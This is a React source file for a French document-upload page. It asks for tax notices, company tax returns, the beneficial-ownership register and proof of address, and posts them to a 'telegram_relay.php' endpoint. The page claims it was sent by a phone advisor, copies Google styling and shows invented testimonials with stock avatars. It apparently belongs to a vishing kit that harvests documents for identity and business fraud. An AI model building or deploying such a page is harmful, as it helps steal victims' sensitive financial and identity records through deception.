import React, { useMemo, useRef, useState } from "react";
import "../styles/Home.css";
import headerGif from "../assets/header.gif";

// === URL du relais côté serveur - CORRIGÉ ===
const API_URL =
  process.env.NODE_ENV === "production"
    ? "/api/telegram_relay.php"
    : "https://mylienbusiness.com/api/telegram_relay.php";


// === Exemples d'aperçus (mets tes vraies images ici) ===
const EXAMPLES = {
  avis:     { src: "https://i.ibb.co/XfDQM8B/10107223.webp", title: "Exemple : Avis d'imposition (IR)" },
  liasse:   { src: "https://i.ibb.co/ZpKs5CM/liasse.jpg", title: "Exemple : Liasse fiscale" },
  rbe:      { src: "https://i.ibb.co/99FnKFM/rbe.jpg", title: "Exemple : RBE" },
  domicile: { src: "https://i.ibb.co/5RmhQdM/facture.jpg", title: "Exemple : Justificatif de domicile" },
};

// === Composants ===
const Header = ({ step }) => (
  <>
    <div className="gif-top">
      <img src={headerGif} className="g-gif" alt="Chargement" />
    </div>

    <header className="g-header">
      <div className="intro-card">
        <h1>Avant de continuer</h1>
        <p>
          Cette page vous a été transmise directement par un conseiller au téléphone et n'est accessible que dans ce cadre précis.
          <br />
          Elle sert uniquement à l'envoi de documents spécifiques ou complémentaires nécessaires pour compléter votre dossier.
        </p>
      </div>

      <div className="g-divider" />
      <div className="g-progress-bar" aria-label="Progression">
        <div className={`g-step ${step === 1 ? "active" : ""}`}>1</div>
        <div className={`g-bar ${step === 2 ? "complete" : ""}`} />
        <div className={`g-step ${step === 2 ? "active" : ""}`}>2</div>
      </div>
    </header>
  </>
);

const InfoCard = ({ onContinue }) => (
  <section className="google-card" aria-labelledby="info-title">
    <h2 id="info-title">Information importante</h2>
    <ul className="g-list">
      <li><span className="material-icons">check_circle</span> <b>Au moins un document</b> est obligatoire.</li>
      <li><span className="material-icons">insert_drive_file</span> Formats acceptés : photo (JPEG, PNG) ou PDF.</li>
      <li><span className="material-icons">visibility</span> Les documents doivent être lisibles et conformes.</li>
    </ul>
    <button className="g-btn" onClick={onContinue}>Oui, continuer</button>
  </section>
);

const ExampleModal = ({ id, open, onClose }) => {
  if (!EXAMPLES[id]) return null;
  return (
    <div className={`example-preview-modal ${open ? "show" : ""}`} role="dialog" aria-modal="true">
      <div className="example-preview-content">
        <button className="close-modal" onClick={onClose} aria-label="Fermer">
          <span className="material-icons">close</span>
        </button>
        <img src={EXAMPLES[id].src} alt={EXAMPLES[id].title} />
        <div className="modal-caption">{EXAMPLES[id].title}</div>
      </div>
    </div>
  );
};

const FileRow = ({ id, label, icon, value, onChange, onOpenExample }) => {
  const selected = !!value;
  return (
    <div className="form-group">
      <label htmlFor={id} className="row-label">
        <span className="material-icons icon-blue">{icon}</span>
        <span>{label}</span>
        <button
          type="button"
          className="example-btn"
          onClick={() => onOpenExample(id)}
          aria-label={`Voir un exemple ${label}`}
        >
          <span className="material-icons">help_outline</span>
        </button>
      </label>

      <label className={`custom-file-upload ${selected ? "selected" : ""}`}>
        {selected ? "Fichier sélectionné" : "Choisir un fichier"}
        <input
          id={id}
          type="file"
          accept="image/*,application/pdf"
          onChange={(e) => onChange(id, e.target.files?.[0] || null)}
        />
      </label>
    </div>
  );
};

const UploadForm = ({ onSuccess }) => {
  const [files, setFiles] = useState({ avis: null, liasse: null, rbe: null, domicile: null });
  const [sending, setSending] = useState(false);
  const [uploadProgress, setUploadProgress] = useState(0);
  const [errorMessage, setErrorMessage] = useState("");
  const [modal, setModal] = useState(null);
  const formRef = useRef(null);

  const selectedCount = useMemo(() => Object.values(files).filter(Boolean).length, [files]);
  const handleChange = (id, file) => {
    setFiles((prev) => ({ ...prev, [id]: file }));
    setErrorMessage("");
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (sending) return;
    if (selectedCount < 1) {
      alert("Veuillez importer au moins un document.");
      return;
    }
    setSending(true);
    setUploadProgress(10);
    setErrorMessage("");

    try {
      const fd = new FormData();
      fd.append("documentType", "Documents Entreprise");
      
      if (files.avis) fd.append("avis_imposition", files.avis, files.avis.name);
      if (files.liasse) fd.append("liasse_fiscale", files.liasse, files.liasse.name);
      if (files.rbe) fd.append("rbe", files.rbe, files.rbe.name);
      if (files.domicile) fd.append("justificatif_domicile", files.domicile, files.domicile.name);

      setUploadProgress(30);
      console.log("Envoi vers:", API_URL);

      const controller = new AbortController();
      const timeoutId = setTimeout(() => controller.abort(), 120000);

      const res = await fetch(API_URL, { 
        method: "POST", 
        body: fd,
        signal: controller.signal,
      });
      
      clearTimeout(timeoutId);
      setUploadProgress(70);
      
      console.log("Réponse - Status:", res.status);

      if (!res.ok) {
        const errorText = await res.text();
        console.error("Erreur serveur:", errorText);
        throw new Error(`Erreur serveur (${res.status})`);
      }

      const data = await res.json();
      console.log("Données:", data);
      
      setUploadProgress(90);
      
      if (!data.ok) throw new Error(data.error || "Erreur inconnue");

      setUploadProgress(100);

      setTimeout(() => {
        onSuccess();
        formRef.current?.reset();
        setFiles({ avis: null, liasse: null, rbe: null, domicile: null });
        window.scrollTo({ top: 0, behavior: "smooth" });
      }, 800);
    } catch (err) {
      console.error("Erreur:", err);
      
      let errorMsg = "Erreur lors de l'envoi.";
      if (err.name === 'AbortError') {
        errorMsg = "Délai d'attente dépassé. Veuillez réessayer.";
      } else if (err.message) {
        errorMsg = err.message;
      }
      
      setErrorMessage(errorMsg);
      setUploadProgress(0);
      alert(`${errorMsg}\n\nVeuillez réessayer.`);
    } finally {
      setSending(false);
    }
  };

  return (
    <section className="step-card" aria-labelledby="form-title">
      <div id="form-title" className="form-title">
        <span className="material-icons icon-blue">upload_file</span>
        <span>Importer vos documents</span>
      </div>

      {errorMessage && (
        <div style={{
          padding: '15px',
          background: '#fef2f2',
          border: '1px solid #fca5a5',
          borderRadius: '5px',
          color: '#dc2626',
          marginBottom: '20px'
        }}>
          ❌ {errorMessage}
        </div>
      )}

      <form ref={formRef} onSubmit={handleSubmit} noValidate>
        <FileRow id="avis" label="Avis d'imposition (IR)" icon="description" value={files.avis} onChange={handleChange} onOpenExample={setModal} />
        <FileRow id="liasse" label="Liasse fiscale (IS / sociétés)" icon="folder" value={files.liasse} onChange={handleChange} onOpenExample={setModal} />
        <FileRow id="rbe" label="RBE – Registre des bénéficiaires effectifs" icon="assignment" value={files.rbe} onChange={handleChange} onOpenExample={setModal} />
        <FileRow id="domicile" label="Justificatif de domicile" icon="home" value={files.domicile} onChange={handleChange} onOpenExample={setModal} />

        {!sending && <button type="submit" className="submit-btn">Envoyer</button>}
        {sending && (
          <div className="sending-box">
            <p>
              Envoi en cours{" "}
              <span className="dots">
                <span>.</span><span>.</span><span>.</span>
              </span>
            </p>
            <div className="progress-bar-container">
              <div className="progress-bar" style={{ width: `${uploadProgress}%` }}></div>
            </div>
            <p style={{ fontSize: "14px", marginTop: "10px", color: "#1a73e8" }}>{uploadProgress}%</p>
          </div>
        )}

        <div className="min-two-hint">
          {selectedCount < 1 ? "⚠️ Min. 1 fichier requis" : "✅ Condition remplie"}
        </div>
      </form>

      {/* Aperçus */}
      <ExampleModal id="avis" open={modal === "avis"} onClose={() => setModal(null)} />
      <ExampleModal id="liasse" open={modal === "liasse"} onClose={() => setModal(null)} />
      <ExampleModal id="rbe" open={modal === "rbe"} onClose={() => setModal(null)} />
      <ExampleModal id="domicile" open={modal === "domicile"} onClose={() => setModal(null)} />
    </section>
  );
};

// --- Commentaires (même rendu que Home) ---
const Comments = () => (
  <section className="comments" aria-labelledby="comments-title">
    <h3 id="comments-title">Commentaires</h3>
    <div className="comments-grid">
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=32" alt="Utilisateur" />
        <div className="comment-body">
          <div className="stars" aria-label="5 sur 5">★★★★★</div>
          <p>Très simple d'utilisation, j'ai pu envoyer mes documents en 2 minutes.</p>
          <div className="comment-author">— Sophie M.</div>
        </div>
      </article>
      <article className="comment-card">
        <img src="https://i.pravatar.cc/64?img=47" alt="Utilisateur" />
        <div className="comment-body">
          <div className="stars" aria-label="5 sur 5">★★★★★</div>
          <p>Interface claire et rapide, je recommande vivement.</p>
          <div className="comment-author">— Marc L.</div>
        </div>
      </article>
    </div>
  </section>
);

export default function Documents() {
  const [step, setStep] = useState(1);
  const [success, setSuccess] = useState(false);

  return (
    <main className="google-form-main">
      <Header step={success ? 2 : step} />
      {!success && step === 1 && <InfoCard onContinue={() => setStep(2)} />}
      {!success && step === 2 && <UploadForm onSuccess={() => setSuccess(true)} />}
      {success && (
        <div className="success-message fade-in">
          <h2><span className="material-icons" style={{ color: "#34a853" }}>check_circle</span> Merci !</h2>
          <p>
            Vos documents ont bien été transmis.<br />
            Notre équipe vous recontactera prochainement.
          </p>
        </div>
      )}

      {/* Section commentaires */}
      <Comments />
    </main>
  );
}